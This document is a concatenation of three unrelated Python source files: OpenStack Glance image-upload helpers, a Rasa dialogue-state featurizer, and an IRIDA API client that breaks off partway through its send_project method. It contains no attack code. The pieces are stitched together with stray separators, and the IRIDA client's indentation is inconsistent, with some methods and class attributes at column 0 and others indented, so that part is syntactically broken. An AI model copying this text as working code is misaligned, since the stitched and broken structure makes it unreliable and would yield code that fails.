# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import webob.exc
from glance.common import exception
from glance.openstack.common import excutils
from glance.common import utils
import glance.convertor
import glance.db
import glance.openstack.common.log as logging
import glance.registry.client.v1.api as registry
import glance.store
CONF = cfg.CONF
CONF.import_opt('convert_image_to_raw', 'glance.convertor')
LOG = logging.getLogger(__name__)
def initiate_deletion(req, location, id, delayed_delete=False):
    """
    Deletes image data from the backend store.

    :param req: The WSGI/Webob Request object
    :param location: URL to the image data in a data store
    :param id: Opaque image identifier
    :param delayed_delete: whether data deletion will be delayed
    """
    if delayed_delete:
        glance.store.schedule_delayed_delete_from_backend(req.context,
                                                          location, id)
        return
    glance.store.safe_delete_from_backend(req.context, location, id)
def _kill(req, image_id):
    """
    Marks the image status to `killed`.

    :param req: The WSGI/Webob Request object
    :param image_id: Opaque image identifier
    """
    status_update = {'status': 'killed'}
    registry.update_image_metadata(req.context, image_id, status_update)
def safe_kill(req, image_id):
    """
    Mark image killed without raising exceptions if it fails.

    Since _kill is meant to be called from exceptions handlers, it should
    not raise itself, rather it should just log its error.

    :param req: The WSGI/Webob Request object
    :param image_id: Opaque image identifier
    """
    try:
        _kill(req, image_id)
    except Exception:
        # Deliberate best-effort: swallow the failure, but keep the full
        # traceback in the log. (The bound exception was never used, so
        # the 'as e' binding has been dropped.)
        LOG.exception(_("Unable to kill image %(id)s: ") % {'id': image_id})
def upload_data_to_store(req, image_meta, image_data, store, notifier):
    """
    Upload image data to specified store.

    Upload image data to the store and cleans up on error. On any failure
    the image record is marked 'killed', an 'image.upload' error event is
    emitted, and a matching webob HTTP error is raised.

    :param req: The WSGI/Webob Request object
    :param image_meta: Mapping of image metadata; must contain 'id'
    :param image_data: File-like object supplying the image bytes
    :param store: Backend store to write the data to
    :param notifier: Notifier used for 'image.upload' error events
    :returns: tuple of (updated image_meta, location, locations_metadata)
    """
    image_id = image_meta['id']

    db_api = glance.db.get_api()
    image_size = image_meta.get('size', None)

    try:
        # Enforce the quota up front; wrap the reader so the client cannot
        # stream more than the remaining allowance.
        remaining = glance.api.common.check_quota(
            req.context, image_size, db_api, image_id=image_id)
        if remaining is not None:
            image_data = utils.LimitingReader(image_data, remaining)

        if CONF.convert_image_to_raw and \
                image_meta.get('container_format', 'bare') == 'bare':
            image_data, new_size = glance.convertor.convert(
                utils.CooperativeReader(image_data))
            image_meta['size'] = new_size
            # NOTE(sileht): disable checksum check
            # the V2 API doesn't check that, so...
            image_meta['checksum'] = None
        (location,
         size,
         checksum,
         locations_metadata) = glance.store.store_add_to_backend(
             image_meta['id'],
             utils.CooperativeReader(image_data),
             image_meta['size'],
             store)

        try:
            # recheck the quota in case there were simultaneous uploads that
            # did not provide the size
            glance.api.common.check_quota(
                req.context, size, db_api, image_id=image_id)
        except exception.StorageQuotaFull:
            # BUGFIX: the message had two %s placeholders but a single
            # argument, which raised TypeError instead of logging.
            LOG.info(_('Cleaning up %s after exceeding the quota')
                     % image_id)
            # BUGFIX: argument order now matches the other call sites'
            # (context, location, image_id) ordering.
            glance.store.safe_delete_from_backend(
                req.context, location, image_meta['id'])
            raise

        def _kill_mismatched(image_meta, attr, actual):
            # Abort the upload if a client-supplied size/checksum disagrees
            # with the value computed by the backend store.
            supplied = image_meta.get(attr)
            if supplied and supplied != actual:
                msg = _("Supplied %(attr)s (%(supplied)s) and "
                        "%(attr)s generated from uploaded image "
                        "(%(actual)s) did not match. Setting image "
                        "status to 'killed'.") % locals()
                LOG.error(msg)
                safe_kill(req, image_id)
                initiate_deletion(req, location, image_id, CONF.delayed_delete)
                raise webob.exc.HTTPBadRequest(explanation=msg,
                                               content_type="text/plain",
                                               request=req)

        # Verify any supplied size/checksum value matches size/checksum
        # returned from store when adding image
        _kill_mismatched(image_meta, 'size', size)
        _kill_mismatched(image_meta, 'checksum', checksum)

        # Update the database with the checksum returned
        # from the backend store
        LOG.debug(_("Updating image %(image_id)s data. "
                    "Checksum set to %(checksum)s, size set "
                    "to %(size)d"), locals())
        update_data = {'checksum': checksum,
                       'size': size}
        if CONF.convert_image_to_raw and \
                image_meta.get('container_format', 'bare') == 'bare':
            update_data['disk_format'] = 'raw'
        try:
            image_meta = registry.update_image_metadata(req.context,
                                                        image_id,
                                                        update_data)

        except exception.NotFound:
            msg = _("Image %s could not be found after upload. The image may "
                    "have been deleted during the upload.") % image_id
            LOG.info(msg)

            # NOTE(jculp): we need to clean up the datastore if an image
            # resource is deleted while the image data is being uploaded
            #
            # We get "location" from above call to store.add(), any
            # exceptions that occur there handle this same issue internally,
            # Since this is store-agnostic, should apply to all stores.
            initiate_deletion(req, location, image_id, CONF.delayed_delete)
            raise webob.exc.HTTPPreconditionFailed(explanation=msg,
                                                   request=req,
                                                   content_type='text/plain')

    except exception.Duplicate as e:
        msg = _("Attempt to upload duplicate image: %s") % e
        LOG.debug(msg)
        safe_kill(req, image_id)
        notifier.error('image.upload', msg)
        raise webob.exc.HTTPConflict(explanation=msg,
                                     request=req,
                                     content_type="text/plain")

    except exception.Forbidden as e:
        msg = _("Forbidden upload attempt: %s") % e
        LOG.debug(msg)
        safe_kill(req, image_id)
        notifier.error('image.upload', msg)
        raise webob.exc.HTTPForbidden(explanation=msg,
                                      request=req,
                                      content_type="text/plain")

    except exception.StorageFull as e:
        msg = _("Image storage media is full: %s") % e
        LOG.error(msg)
        safe_kill(req, image_id)
        notifier.error('image.upload', msg)
        raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg,
                                                  request=req,
                                                  content_type='text/plain')

    except exception.StorageWriteDenied as e:
        msg = _("Insufficient permissions on image storage media: %s") % e
        LOG.error(msg)
        safe_kill(req, image_id)
        notifier.error('image.upload', msg)
        raise webob.exc.HTTPServiceUnavailable(explanation=msg,
                                               request=req,
                                               content_type='text/plain')

    except exception.ImageSizeLimitExceeded:
        msg = (_("Denying attempt to upload image larger than %d bytes.")
               % CONF.image_size_cap)
        LOG.info(msg)
        safe_kill(req, image_id)
        notifier.error('image.upload', msg)
        raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg,
                                                  request=req,
                                                  content_type='text/plain')

    except exception.StorageQuotaFull as e:
        msg = (_("Denying attempt to upload image because it exceeds the ."
                 "quota: %s") % e)
        LOG.info(msg)
        safe_kill(req, image_id)
        notifier.error('image.upload', msg)
        raise webob.exc.HTTPRequestEntityTooLarge(explanation=msg,
                                                  request=req,
                                                  content_type='text/plain')

    except webob.exc.HTTPError:
        #NOTE(bcwaldon): Ideally, we would just call 'raise' here,
        # but something in the above function calls is affecting the
        # exception context and we must explicitly re-raise the
        # caught exception.
        msg = _("Received HTTP error while uploading image %s") % image_id
        notifier.error('image.upload', msg)
        with excutils.save_and_reraise_exception():
            LOG.exception(msg)
            safe_kill(req, image_id)

    except (ValueError, IOError):
        msg = _("Client disconnected before sending all data to backend")
        LOG.debug(msg)
        safe_kill(req, image_id)
        raise webob.exc.HTTPBadRequest(explanation=msg,
                                       content_type="text/plain",
                                       request=req)

    except Exception:
        msg = _("Failed to upload image %s") % image_id
        LOG.exception(msg)
        safe_kill(req, image_id)
        notifier.error('image.upload', msg)
        raise webob.exc.HTTPInternalServerError(explanation=msg,
                                                request=req,
                                                content_type='text/plain')

    return image_meta, location, locations_metadata
| |
import logging
import numpy as np
import scipy.sparse
from typing import List, Optional, Dict, Text, Set, Any
from rasa.core.featurizers.precomputation import MessageContainerForCoreFeaturization
from rasa.nlu.extractors.extractor import EntityTagSpec
from rasa.nlu.utils import bilou_utils
from rasa.nlu.utils.bilou_utils import BILOU_PREFIXES
from rasa.shared.core.domain import SubState, State, Domain
from rasa.shared.core.constants import PREVIOUS_ACTION, ACTIVE_LOOP, USER, SLOTS
from rasa.shared.core.trackers import is_prev_action_listen_in_state
from rasa.shared.nlu.constants import (
ENTITIES,
FEATURE_TYPE_SENTENCE,
ACTION_TEXT,
ACTION_NAME,
INTENT,
NO_ENTITY_TAG,
ENTITY_ATTRIBUTE_TYPE,
ENTITY_TAGS,
TEXT,
)
from rasa.shared.nlu.training_data.features import Features
from rasa.utils.tensorflow import model_data_utils
logger = logging.getLogger(__name__)
class SingleStateFeaturizer:
    """Base class to transform the dialogue state into an ML format.

    Subclasses of SingleStateFeaturizer will decide how a bot will
    transform the dialogue state into a dictionary mapping an attribute
    to its features. Possible attributes are: `INTENT`, `TEXT`, `ACTION_NAME`,
    `ACTION_TEXT`, `ENTITIES`, `SLOTS` and `ACTIVE_LOOP`. Each attribute will be
    featurized into a list of `rasa.utils.features.Features`.
    """

    def __init__(self) -> None:
        """Initialize the single state featurizer."""
        # Maps attribute -> {feature_state: index}; filled by
        # `prepare_for_training`.
        self._default_feature_states: Dict[Text, Dict[Text, int]] = {}
        self.action_texts: List[Text] = []
        self.entity_tag_specs: List[EntityTagSpec] = []

    def _create_entity_tag_specs(
        self, bilou_tagging: bool = False
    ) -> List[EntityTagSpec]:
        """Returns the tag to index mapping for entities.

        Returns:
            Tag to index mapping.
        """
        if ENTITIES not in self._default_feature_states:
            return []

        if bilou_tagging:
            tag_id_index_mapping = {
                f"{prefix}{tag}": idx_1 * len(BILOU_PREFIXES) + idx_2 + 1
                for tag, idx_1 in self._default_feature_states[ENTITIES].items()
                for idx_2, prefix in enumerate(BILOU_PREFIXES)
            }
        else:
            tag_id_index_mapping = {
                tag: idx + 1  # +1 to keep 0 for the NO_ENTITY_TAG
                for tag, idx in self._default_feature_states[ENTITIES].items()
            }

        # NO_ENTITY_TAG corresponds to non-entity which should correspond to 0 index
        # needed for correct prediction for padding
        tag_id_index_mapping[NO_ENTITY_TAG] = 0

        # TODO
        #  The entity states used to create the tag-idx-mapping contains the
        #  entities and the concatenated entity and roles/groups. We do not
        #  distinguish between entities and roles/groups right now.
        # we return a list to anticipate that
        return [
            EntityTagSpec(
                tag_name=ENTITY_ATTRIBUTE_TYPE,
                tags_to_ids=tag_id_index_mapping,
                ids_to_tags={value: key for key, value in tag_id_index_mapping.items()},
                num_tags=len(tag_id_index_mapping),
            )
        ]

    def prepare_for_training(
        self, domain: Domain, bilou_tagging: bool = False,
    ) -> None:
        """Gets necessary information for featurization from domain.

        Args:
            domain: An instance of :class:`rasa.shared.core.domain.Domain`.
            bilou_tagging: indicates whether BILOU tagging should be used or not
        """
        # store feature states for each attribute in order to create binary features
        def convert_to_dict(feature_states: List[Text]) -> Dict[Text, int]:
            return {
                feature_state: idx for idx, feature_state in enumerate(feature_states)
            }

        self._default_feature_states[INTENT] = convert_to_dict(domain.intents)
        self._default_feature_states[ACTION_NAME] = convert_to_dict(
            domain.action_names_or_texts
        )
        self._default_feature_states[ENTITIES] = convert_to_dict(domain.entity_states)
        self._default_feature_states[SLOTS] = convert_to_dict(domain.slot_states)
        self._default_feature_states[ACTIVE_LOOP] = convert_to_dict(domain.form_names)
        self.action_texts = domain.action_texts
        self.entity_tag_specs = self._create_entity_tag_specs(bilou_tagging)

    def _state_features_for_attribute(
        self, sub_state: SubState, attribute: Text
    ) -> Dict[Text, int]:
        """Returns the binary feature states present for one attribute."""
        # FIXME: the code below is not type-safe, but fixing it
        #   would require more refactoring, for instance using
        #   data classes in our states
        if attribute in {INTENT, ACTION_NAME}:
            return {sub_state[attribute]: 1}  # type: ignore[dict-item]
        elif attribute == ENTITIES:
            return {entity: 1 for entity in sub_state.get(ENTITIES, [])}
        elif attribute == ACTIVE_LOOP:
            return {sub_state["name"]: 1}  # type: ignore[dict-item]
        elif attribute == SLOTS:
            return {
                f"{slot_name}_{i}": value
                for slot_name, slot_as_feature in sub_state.items()
                for i, value in enumerate(slot_as_feature)
            }
        else:
            raise ValueError(
                f"Given attribute '{attribute}' is not supported. "
                f"It must be one of '{self._default_feature_states.keys()}'."
            )

    def _create_features(
        self, sub_state: SubState, attribute: Text, sparse: bool = False
    ) -> List[Features]:
        """Builds a one-hot style sentence feature vector for `attribute`."""
        state_features = self._state_features_for_attribute(sub_state, attribute)

        features = np.zeros(len(self._default_feature_states[attribute]), np.float32)
        for state_feature, value in state_features.items():
            # check that the value is in default_feature_states to be able to assign
            # its value
            if state_feature in self._default_feature_states[attribute]:
                features[self._default_feature_states[attribute][state_feature]] = value
        features = np.expand_dims(features, 0)

        if sparse:
            features = scipy.sparse.coo_matrix(features)

        return [
            Features(
                features, FEATURE_TYPE_SENTENCE, attribute, self.__class__.__name__
            )
        ]

    @staticmethod
    def _to_sparse_sentence_features(
        sparse_sequence_features: List[Features],
    ) -> List[Features]:
        """Sums sequence features over time into sparse sentence features."""
        return [
            Features(
                scipy.sparse.coo_matrix(feature.features.sum(0)),
                FEATURE_TYPE_SENTENCE,
                feature.attribute,
                feature.origin,
            )
            for feature in sparse_sequence_features
        ]

    @staticmethod
    def _get_name_attribute(attributes: Set[Text]) -> Optional[Text]:
        """Returns the INTENT or ACTION_NAME attribute, if present."""
        # there is always either INTENT or ACTION_NAME
        return next(
            (
                attribute
                for attribute in attributes
                if attribute in {INTENT, ACTION_NAME}
            ),
            None,
        )

    def _extract_state_features(
        self,
        sub_state: SubState,
        precomputations: Optional[MessageContainerForCoreFeaturization],
        sparse: bool = False,
    ) -> Dict[Text, List[Features]]:
        """Collects features for all attributes of a sub-state."""
        # Remove entities from possible attributes
        attributes = set(
            attribute for attribute in sub_state.keys() if attribute != ENTITIES
        )

        if precomputations is not None:

            # Collect features for all those attributes
            attributes_to_features = precomputations.collect_features(
                sub_state, attributes=attributes
            )
            # if features for INTENT or ACTION_NAME exist,
            # they are always sparse sequence features;
            # transform them to sentence sparse features
            if attributes_to_features.get(INTENT):
                attributes_to_features[INTENT] = self._to_sparse_sentence_features(
                    attributes_to_features[INTENT]
                )
            if attributes_to_features.get(ACTION_NAME):
                attributes_to_features[ACTION_NAME] = self._to_sparse_sentence_features(
                    attributes_to_features[ACTION_NAME]
                )

            # Combine and sort the features:
            # Per attribute, combine features of same type and level into one Feature,
            # and (if there are any such features) store the results in a list where
            # - all the sparse features are listed first and a
            # - sequence feature is always listed before the sentence feature of the
            #   same type (sparse/not sparse).
            output = {
                attribute: Features.reduce(
                    features_list=features_list, expected_origins=None
                )
                for attribute, features_list in attributes_to_features.items()
                if len(features_list) > 0  # otherwise, following will fail
            }
        else:
            output = {}

        # Check that the name attribute has features
        name_attribute = self._get_name_attribute(attributes)
        if name_attribute and name_attribute not in output:
            # nlu pipeline didn't create features for user or action
            # this might happen, for example, when we have action_name in the state
            # but it did not get featurized because only character level
            # CountVectorsFeaturizer was included in the config.
            output[name_attribute] = self._create_features(
                sub_state, name_attribute, sparse
            )

        return output

    def encode_state(
        self,
        state: State,
        precomputations: Optional[MessageContainerForCoreFeaturization],
    ) -> Dict[Text, List[Features]]:
        """Encode the given state.

        Args:
            state: The state to encode
            precomputations: Contains precomputed features and attributes.

        Returns:
            A dictionary of state_type to list of features.
        """
        state_features = {}
        for state_type, sub_state in state.items():
            if state_type == PREVIOUS_ACTION:
                state_features.update(
                    self._extract_state_features(
                        sub_state, precomputations=precomputations, sparse=True,
                    )
                )
            # featurize user only if it is "real" user input,
            # i.e. input from a turn after action_listen
            if state_type == USER and is_prev_action_listen_in_state(state):

                state_features.update(
                    self._extract_state_features(
                        sub_state, precomputations=precomputations, sparse=True,
                    )
                )
                if sub_state.get(ENTITIES):
                    state_features[ENTITIES] = self._create_features(
                        sub_state, ENTITIES, sparse=True
                    )

            if state_type in {SLOTS, ACTIVE_LOOP}:
                state_features[state_type] = self._create_features(
                    sub_state, state_type, sparse=True
                )

        return state_features

    def encode_entities(
        self,
        entity_data: Dict[Text, Any],
        precomputations: Optional[MessageContainerForCoreFeaturization],
        bilou_tagging: bool = False,
    ) -> Dict[Text, List[Features]]:
        """Encode the given entity data.

        Produce numeric entity tags for tokens.

        Args:
            entity_data: The dict containing the text and entity labels and locations
            precomputations: Contains precomputed features and attributes.
            bilou_tagging: indicates whether BILOU tagging should be used or not

        Returns:
            A dictionary of entity type to list of features.
        """
        # TODO
        #  The entity states used to create the tag-idx-mapping contains the
        #  entities and the concatenated entity and roles/groups. We do not
        #  distinguish between entities and roles/groups right now.
        if (
            not entity_data
            or precomputations is None
            or not self.entity_tag_specs
            or self.entity_tag_specs[0].num_tags < 2
        ):
            # we cannot build a classifier with fewer than 2 classes
            return {}

        message = precomputations.lookup_message(user_text=entity_data[TEXT])
        # BUGFIX: check for a missing message *before* dereferencing it;
        # previously `message.data` was accessed first, so a None lookup
        # result raised AttributeError and the guard below was dead code.
        if not message:
            return {}
        message.data[ENTITIES] = entity_data[ENTITIES]

        if bilou_tagging:
            bilou_utils.apply_bilou_schema_to_message(message)

        return {
            ENTITY_TAGS: [
                model_data_utils.get_tag_ids(
                    message, self.entity_tag_specs[0], bilou_tagging
                )
            ]
        }

    def _encode_action(
        self,
        action: Text,
        precomputations: Optional[MessageContainerForCoreFeaturization],
    ) -> Dict[Text, List[Features]]:
        """Encodes one action name or action text as a sub-state."""
        if action in self.action_texts:
            action_as_sub_state = {ACTION_TEXT: action}
        else:
            action_as_sub_state = {ACTION_NAME: action}

        return self._extract_state_features(
            action_as_sub_state, precomputations=precomputations
        )

    def encode_all_labels(
        self,
        domain: Domain,
        precomputations: Optional[MessageContainerForCoreFeaturization],
    ) -> List[Dict[Text, List[Features]]]:
        """Encode all action from the domain.

        Args:
            domain: The domain that contains the actions.
            precomputations: Contains precomputed features and attributes.

        Returns:
            A list of encoded actions.
        """
        return [
            self._encode_action(action, precomputations)
            for action in domain.action_names_or_texts
        ]
class IntentTokenizerSingleStateFeaturizer(SingleStateFeaturizer):
    """A SingleStateFeaturizer for use with policies that predict intent labels."""

    def _encode_intent(
        self,
        intent: Text,
        precomputations: Optional[MessageContainerForCoreFeaturization],
    ) -> Dict[Text, List[Features]]:
        """Extracts a numeric representation of an intent.

        Args:
            intent: Intent to be encoded.
            precomputations: Contains precomputed features and attributes.

        Returns:
            Encoded representation of intent.
        """
        # Wrap the bare intent label in a sub-state so the shared
        # feature-extraction path can handle it.
        sub_state = {INTENT: intent}
        return self._extract_state_features(sub_state, precomputations)

    def encode_all_labels(
        self,
        domain: Domain,
        precomputations: Optional[MessageContainerForCoreFeaturization],
    ) -> List[Dict[Text, List[Features]]]:
        """Encodes all relevant labels from the domain using the given precomputations.

        Args:
            domain: The domain that contains the labels.
            precomputations: Contains precomputed features and attributes.

        Returns:
            A list of encoded labels.
        """
        return [
            self._encode_intent(label, precomputations) for label in domain.intents
        ]
| |
import ast
import json
import httplib
import itertools
from urllib2 import urlopen, URLError
from urlparse import urljoin
from time import time
from copy import deepcopy
from os import path
import logging
import threading
from rauth import OAuth2Service
from requests.adapters import HTTPAdapter
from requests.exceptions import HTTPError as request_HTTPError
from Model.Project import Project
from Model.Sample import Sample
from Exceptions.ProjectError import ProjectError
from Exceptions.SampleError import SampleError
from Exceptions.SequenceFileError import SequenceFileError
from Exceptions.SampleSheetError import SampleSheetError
from Validation.offlineValidation import validate_URL_form
from API.pubsub import send_message
HTTP_MAX_RETRIES = 5
HTTP_BACKOFF_FACTOR = 1
class ApiCalls(object):
_instance = None
    def __new__(cls, client_id, client_secret, base_URL, username, password, max_wait_time=20):
        """
        Overriding __new__ to implement a singleton
        This is done instead of a decorator so that mocking still works for class.

        If the instance has not been created yet, or the passed in arguments are different, create a new instance,
        and drop the old (if existing) instance
        If the instance already exists and is valid, return the instance

        arguments:
            client_id -- client_id for creating access token.
            client_secret -- client_secret for creating access token.
            base_URL -- url of the IRIDA server
            username -- username for server
            password -- password for given username
            max_wait_time -- timeout (seconds), default=20

        returns the (possibly newly created) singleton ApiCalls instance
        """
        if not ApiCalls._instance or ApiCalls._instance.parameters_are_different(
                client_id, client_secret, base_URL,username, password, max_wait_time):
            # Create a new instance of the API
            ApiCalls._instance = object.__new__(cls)
            # initialize API instance variables
            ApiCalls._instance.client_id = client_id
            ApiCalls._instance.client_secret = client_secret
            ApiCalls._instance.base_URL = base_URL
            ApiCalls._instance.username = username
            ApiCalls._instance.password = password
            ApiCalls._instance.max_wait_time = max_wait_time
            # initialize API object
            # The lock guards lazy session refresh in the `session` property;
            # _session_set_externally marks a caller-injected session that
            # must not be validated/replaced.
            ApiCalls._instance._session_lock = threading.Lock()
            ApiCalls._instance._session_set_externally = False
            ApiCalls._instance.create_session()
            # Per-instance caches; invalidated when a new session is built.
            ApiCalls._instance.cached_projects = None
            ApiCalls._instance.cached_samples = {}
        return ApiCalls._instance
@classmethod
def close(cls):
"""
Close the current session by setting the current instance to None so
the next call with re-initialize the session
"""
ApiCalls._instance = None
def parameters_are_different(self, client_id, client_secret, base_URL, username, password, max_wait_time):
"""
Compare the current instance variables with a new set of variables
"""
result = (self.client_id != client_id or
self.client_secret != client_secret or
self.base_URL != base_URL or
self.username != username or
self.password != password or
self.max_wait_time != max_wait_time)
if result:
logging.warning("ApiCalls session instance parameters are different, "
"a new session instance will be created")
return result
@property
def session(self):
    """
    An OAuth2 session that is known to be usable.

    If a session was injected from outside it is returned untouched.
    Otherwise the cached session is probed with a cheap OPTIONS request;
    when the probe fails (typically because the OAuth token expired) a
    new authenticated session is created. The lock prevents concurrent
    callers from racing on re-authentication.
    """
    if self._session_set_externally:
        # Caller owns the session lifecycle; never replace it here.
        return self._session
    try:
        self._session_lock.acquire()
        response = self._session.options(self.base_URL)
        if response.status_code != httplib.OK:
            raise Exception("Session probe returned %s" % response.status_code)
        else:
            logging.debug("Existing session still works, going to reuse it.")
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed while checking the session.
        logging.debug("Token is probably expired, going to get a new session.")
        oauth_service = self.get_oauth_service()
        access_token = self.get_access_token(oauth_service)
        new_session = oauth_service.get_session(access_token)
        self._session = self.add_timeout_backoff(new_session)
    finally:
        self._session_lock.release()
    return self._session
@session.setter
def session(self, session):
    # Allow callers (e.g. tests) to inject a pre-built session; the flag
    # stops the `session` property getter from probing/replacing it later.
    self._session = session
    self._session_set_externally = True
def create_session(self):
    """
    Build and cache an authenticated OAuth2 session to be re-used until
    expiry for get and post calls.

    Raises URLError for a malformed base URL, and a generic Exception
    when the server cannot be reached with the given credentials.
    """
    self.cached_projects = None
    # set http backoff option
    self.http_max_retries = HTTP_MAX_RETRIES
    self.http_backoff_factor = HTTP_BACKOFF_FACTOR
    # The API links below are all resolved relative to a trailing slash.
    if not self.base_URL.endswith("/"):
        self.base_URL = self.base_URL + "/"
    if not validate_URL_form(self.base_URL):
        raise URLError(self.base_URL + " is not a valid URL")
    oauth_service = self.get_oauth_service()
    access_token = self.get_access_token(oauth_service)
    self._session = self.add_timeout_backoff(oauth_service.get_session(access_token))
    if self.validate_URL_existence(self.base_URL, use_session=True) is False:
        raise Exception("Cannot create session. Verify your credentials are correct.")
def add_timeout_backoff(self, new_session):
    """
    Mount retry/backoff-aware HTTP adapters on the given session so that
    requests which time out are retried automatically.

    (Retry approach adapted from
    https://www.programcreek.com/python/example/102997/requests.adapters
    example 3.)
    """
    try:
        # Older requests releases do not vendorize urllib3; in that case
        # fall back to a plain integer retry count.
        from requests.packages.urllib3.util.retry import Retry
    except ImportError:
        retry_policy = self.http_max_retries
    else:
        retry_policy = Retry(
            total=self.http_max_retries,
            read=self.http_max_retries,
            backoff_factor=self.http_backoff_factor,
            status_forcelist=[408, 504, 522, 524]
        )
    for scheme in ('https://', 'http://'):
        new_session.mount(scheme, HTTPAdapter(max_retries=retry_policy))
    return new_session
def get_oauth_service(self):
    """
    Construct the OAuth2Service used to obtain access tokens from the
    server's oauth/token endpoint.

    returns the OAuth2Service instance
    """
    return OAuth2Service(
        client_id=self.client_id,
        client_secret=self.client_secret,
        name="irida",
        access_token_url=urljoin(self.base_URL, "oauth/token"),
        base_url=self.base_URL
    )
def get_access_token(self, oauth_service):
    """
    Request an access token from the given OAuth2 service using the
    resource-owner password-credentials grant.

    arguments:
        oauth_service -- OAuth2Service from get_oauth_service

    returns the access token
    """
    credentials = {
        "grant_type": "password",
        "client_id": self.client_id,
        "client_secret": self.client_secret,
        "username": self.username,
        "password": self.password
    }
    return oauth_service.get_access_token(decoder=self.decoder,
                                          data=credentials)
def decoder(self, return_dict):
    """
    Safely evaluate the access-token response string into a Python
    dictionary (literals only; no arbitrary code is executed).

    arguments:
        return_dict -- access token dictionary, as text

    returns the evaluated dictionary
    """
    return ast.literal_eval(return_dict)
def validate_URL_existence(self, url, use_session=False):
    """
    Probe the given URL and report whether it exists.

    arguments:
        url -- the url link to open and validate
        use_session -- if True use self.session.get(url) instead of
                       urlopen(url) to get the response

    returns True on HTTP 200 (OK), False on HTTP 404 (NOT FOUND); any
    other status raises an Exception carrying the code and message.
    """
    if use_session:
        response = self.session.get(url)
        status = response.status_code
        message = response.reason
    else:
        response = urlopen(url, timeout=self.max_wait_time)
        status = response.code
        message = response.msg
    if status == httplib.OK:
        return True
    if status == httplib.NOT_FOUND:
        return False
    raise Exception(str(status) + " " + message)
def get_link(self, targ_url, target_key, targ_dict=""):
    """
    makes a call to targ_url(api) expecting a json response
    tries to retrieve target_key from response to find link to resource
    raises exceptions if target_key not found or targ_url is invalid
    arguments:
        targ_url -- URL to retrieve link from
        target_key -- name of link (e.g projects or project/samples)
        targ_dict -- optional dict containing key and value to search
                     in targets.
                     (e.g {key="identifier",value="100"} to retrieve where
                     identifier=100)
    returns link if it exists
    """
    # NOTE(review): targ_dict defaults to "" (not {}) so the len() test
    # below works for both the default and a populated dict.
    if self.validate_URL_existence(targ_url, use_session=True):
        response = self.session.get(targ_url)
        if len(targ_dict) > 0:
            # Narrow down to the single resource matching targ_dict
            # before searching its links.
            resources_list = response.json()["resource"]["resources"]
            try:
                links_list = next(r["links"] for r in resources_list
                                  if r[targ_dict["key"]].lower() ==
                                  targ_dict["value"].lower())
            except KeyError:
                raise KeyError(targ_dict["key"] + " not found." +
                               " Available keys: " +
                               ", ".join(resources_list[0].keys()))
            except StopIteration:
                raise KeyError(targ_dict["value"] + " not found.")
        else:
            links_list = response.json()["resource"]["links"]
        # Find the href whose rel matches target_key in whichever links
        # list was selected above.
        try:
            ret_val = next(link["href"] for link in links_list
                           if link["rel"] == target_key)
        except StopIteration:
            raise KeyError(target_key + " not found in links. " +
                           "Available links: " +
                           ", ".join(
                               [str(link["rel"]) for link in links_list]))
    else:
        raise request_HTTPError("Error: " +
                                targ_url + " is not a valid URL")
    return ret_val
def get_projects(self):
    """
    API call to api/projects to get the list of projects.

    Results are cached on the instance; the server is only contacted
    when the cache is empty.

    returns list containing projects; each project is a Project object.
    Raises KeyError when the server response is missing expected keys.
    """
    if self.cached_projects is None:
        logging.info("Loading projects from server.")
        url = self.get_link(self.base_URL, "projects")
        response = self.session.get(url)
        result = response.json()["resource"]["resources"]
        try:
            project_list = [
                Project(
                    projDict["name"],
                    projDict["projectDescription"],
                    projDict["identifier"]
                )
                for projDict in result
            ]
        except KeyError as e:
            # `except KeyError, e` is removed Python 3 syntax; `as`
            # works on Python 2.6+ as well.
            msg_arg = " ".join(map(str, e.args))
            raise KeyError(msg_arg + " not found." + " Available keys: " +
                           ", ".join(result[0].keys()))
        self.cached_projects = project_list
    else:
        logging.info("Loading projects from cache.")
    return self.cached_projects
def get_samples(self, project=None, sample=None):
    """
    API call to api/projects/project_id/samples

    arguments:
        project -- a Project object used to get project_id
        sample -- alternatively, a Sample object whose project id is used

    returns list of samples for the given project, each a Sample object,
    served from a per-project cache after the first call.
    """
    if sample is not None:
        project_id = sample.get_project_id()
    elif project is not None:
        project_id = project.get_id()
    else:
        raise Exception("Missing project or sample object.")
    if project_id not in self.cached_samples:
        try:
            proj_URL = self.get_link(self.base_URL, "projects")
            samples_url = self.get_link(proj_URL, "project/samples",
                                        targ_dict={
                                            "key": "identifier",
                                            "value": project_id
                                        })
        except StopIteration:
            raise ProjectError("The given project ID: " + project_id + " doesn't exist")
        payload = self.session.get(samples_url).json()
        resources = payload["resource"]["resources"]
        self.cached_samples[project_id] = [Sample(sample_dict) for sample_dict in resources]
    return self.cached_samples[project_id]
def get_sequence_files(self, sample):
    """
    API call to api/projects/project_id/sample_id/sequenceFiles

    arguments:
        sample -- a Sample object providing both the project id and the
                  sample id

    returns list of sequence-file dictionaries for the given sample
    """
    project_id = sample.get_project_id()
    sample_id = sample.get_id()
    try:
        proj_URL = self.get_link(self.base_URL, "projects")
        sample_URL = self.get_link(proj_URL, "project/samples",
                                   targ_dict={
                                       "key": "identifier",
                                       "value": project_id
                                   })
    except StopIteration:
        raise ProjectError("The given project ID: " +
                           project_id + " doesn't exist")
    try:
        url = self.get_link(sample_URL, "sample/sequenceFiles",
                            targ_dict={
                                "key": "sampleName",
                                "value": sample_id
                            })
        response = self.session.get(url)
    except StopIteration:
        raise SampleError("The given sample ID: {} doesn't exist".format(sample_id), [])
    return response.json()["resource"]["resources"]
def send_project(self, project, clear_cache=True):
    """
    POST a new project to IRIDA via the API.

    The project must have a name of at least 5 characters; otherwise a
    ProjectError is raised before anything is sent.

    arguments:
        project -- a Project object to be sent
        clear_cache -- when True, invalidate the local projects cache

    returns a dictionary with the result of the post request: the same
    name and projectDescription that were sent, plus additional keys
    such as createdDate and identifier. A failed post raises
    ProjectError instead of returning.
    """
    if clear_cache:
        self.cached_projects = None
    if len(project.get_name()) < 5:
        raise ProjectError("Invalid project name: " +
                           project.get_name() +
                           ". A project requires a name that must be " +
                           "5 or more characters.")
    url = self.get_link(self.base_URL, "projects")
    json_obj = json.dumps(project.get_dict())
    headers = {
